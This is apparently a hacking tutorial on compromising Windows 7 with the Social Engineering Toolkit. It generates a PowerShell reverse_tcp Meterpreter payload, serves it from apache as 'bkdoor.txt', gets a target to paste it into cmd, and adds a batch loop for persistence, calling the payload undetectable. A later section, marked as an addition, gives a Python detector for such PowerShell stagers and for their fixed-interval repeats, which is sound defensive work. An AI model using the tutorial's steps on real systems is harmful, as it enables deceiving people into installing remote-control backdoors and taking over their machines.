Hi, today I want to show you how to hack Windows using the Social Engineering Toolkit.
First, understand what the Social Engineering Toolkit (SET) is.
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal.
Attacker: Kali Linux 2.0, IP 192.168.164.129, running SET, Metasploit and apache2
Target: Windows 7 Ultimate, IP 192.168.164.130
Start SET in Kali Linux using the setoolkit or se-toolkit command in a terminal, or navigate to Applications > Exploitation Tools > Social Engineering Toolkit.
You will be welcomed by a banner and several numeric options. We are interested in social engineering attacks, so we select option 1 by typing 1 in the terminal.
There are many options here, but we are going with number 9, Powershell Attack Vectors. In other Kali Linux versions the PowerShell attack vector is number 10, so don't get confused.
After selecting no. 9, an explanation of the module is shown along with some more options. We select option 1 (Powershell Alphanumeric Shellcode Injector) and start a listener by typing "yes".
NB: Sometimes you might not want to use the text version of msfconsole and opt for Armitage/Cobalt Strike instead. Don't worry.
It is not a must to start the listener here; all you have to do is remember the LHOST and LPORT values you used, start up Armitage, and set a handler using the payload windows/meterpreter/reverse_tcp with those same LHOST and LPORT values.
Typing "yes" loads a Metasploit handler for the payload that was generated.
NB: Please note the path of your PowerShell payload, usually /root/.set/reports/powershell/.
Navigate to /root/.set/reports/powershell/, copy the payload with the .txt extension to /var/www/ and rename it to a simpler name, like bkdoor.txt (social engineering skills required).
Start the apache2 server using service apache2 start.
So far, if everything was done correctly, your backdoor is served by apache2 at http://127.0.0.1/bkdoor.txt (if bkdoor.txt is what you renamed your payload to).
This means the target would access it at http://192.168.164.129/bkdoor.txt in my case (192.168.164.129 is my Kali Linux LAN IP address).
The URL will show code that is to be copy-pasted into the command prompt of the target's Windows PC (with PowerShell installed; PowerShell is installed by default on most modern Windows versions).
So now, if the target copy-pastes the code into cmd, we will get a meterpreter session in our handler.
NB: This is a reverse_tcp connection, and therefore the handler must be set up before the payload is run. :)
DONE!!!!
Type "help" to view more commands that you can run in meterpreter. Use the post modules in Metasploit to exploit the PC further.
ADDITIONAL NOTES:
.txt PowerShell payloads are flexible, in that you can wrap them in more code using batch. Save the file as bkdoor.bat (or any other name with a .bat extension).
Example:
1. The following batch wrapper re-runs the payload every 200 seconds (3 minutes). Good for manual persistence, though it requires many system resources.
@echo off
:loop
REM copy-paste your PowerShell payload on the line below this comment
REM ping with -n 200 sends 200 echo requests one second apart, so it acts as a ~200 second sleep
Ping 127.0.0.1 -n 200 > %temp%\null
Goto loop
2. The payload could also be converted to an .exe executable (binary file) using the advbat2exe converter (find a tutorial for this online).
3. This payload is fully FUD; it does not require any encryption.
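As an added defensive counterpart to the two procedures above (the PowerShell one-liner pasted into cmd, and the batch sleep loop that re-runs it), and not part of the original post: a Python script that scores constructed process-creation records, with fields modelled on Sysmon Event ID 1 / Windows 4688, for the traces this delivery leaves (powershell.exe spawned by cmd.exe with the profile suppressed, a hidden window, an encoded command and an unusually long argument), then looks for the same command line recurring at a fixed interval, which is exactly the cadence the ping loop produces. The record layout, hostname, sample command lines and thresholds are all assumptions.

```python
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed, simplified process-creation records (fields modelled on Sysmon Event ID 1 /
# Windows 4688), not real logs; the long argument stands in for an encoded one-liner.
STAGER = "powershell -nop -w hidden -enc " + "QUFB" * 100
SAMPLE_EVENTS = [
    {"ts": 0, "host": "WS7", "parent": CMD, "image": PS, "cmdline": STAGER},
    {"ts": 200, "host": "WS7", "parent": CMD, "image": PS, "cmdline": STAGER},
    {"ts": 400, "host": "WS7", "parent": CMD, "image": PS, "cmdline": STAGER},
    {"ts": 30, "host": "WS7", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},  # benign scheduled script
]

def score_event(ev):
    """Reasons a process-creation record looks like a PowerShell one-liner pasted into cmd."""
    reasons = []
    if not ev["image"].lower().endswith("powershell.exe"):
        return reasons
    tokens = ev["cmdline"].lower().split()  # lower-casing does not change token lengths
    if ev["parent"].lower().endswith("cmd.exe"):
        reasons.append("powershell spawned by cmd.exe")
    if any(t in ("-nop", "-noprofile", "-noni", "-noninteractive") for t in tokens):
        reasons.append("profile or interaction suppressed")
    if "hidden" in tokens and any(t in ("-w", "-windowstyle") for t in tokens):
        reasons.append("hidden window")
    if any(t in ("-e", "-ec", "-enc", "-encodedcommand") for t in tokens):
        reasons.append("encoded command")
    longest = max((len(t) for t in tokens), default=0)
    if longest >= 200:
        reasons.append("very long argument (%d chars)" % longest)
    return reasons

def find_suspicious(events, min_reasons=3):
    """Keep records matching several indicators at once; single flags are common in admin use."""
    return [ev for ev in events if len(score_event(ev)) >= min_reasons]

def find_periodic(events, min_repeats=3, jitter=10):
    """Hosts where one suspicious command line recurs at a near-constant interval; {host: seconds}."""
    runs = defaultdict(list)
    for ev in find_suspicious(events):
        runs[(ev["host"], ev["cmdline"])].append(ev["ts"])
    periodic = {}
    for (host, _), times in runs.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(times) >= min_repeats and max(gaps) - min(gaps) <= jitter:
            periodic[host] = round(sum(gaps) / len(gaps))
    return periodic
```

Requiring several indicators together keeps ordinary admin scripts (like the -File example) out of the hit list, while the periodicity check turns the loop's own sleep into a signal.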
We will be getting a reverse TCP connection from the victim machine by using a small backdoor: hack Windows 7 using Metasploit.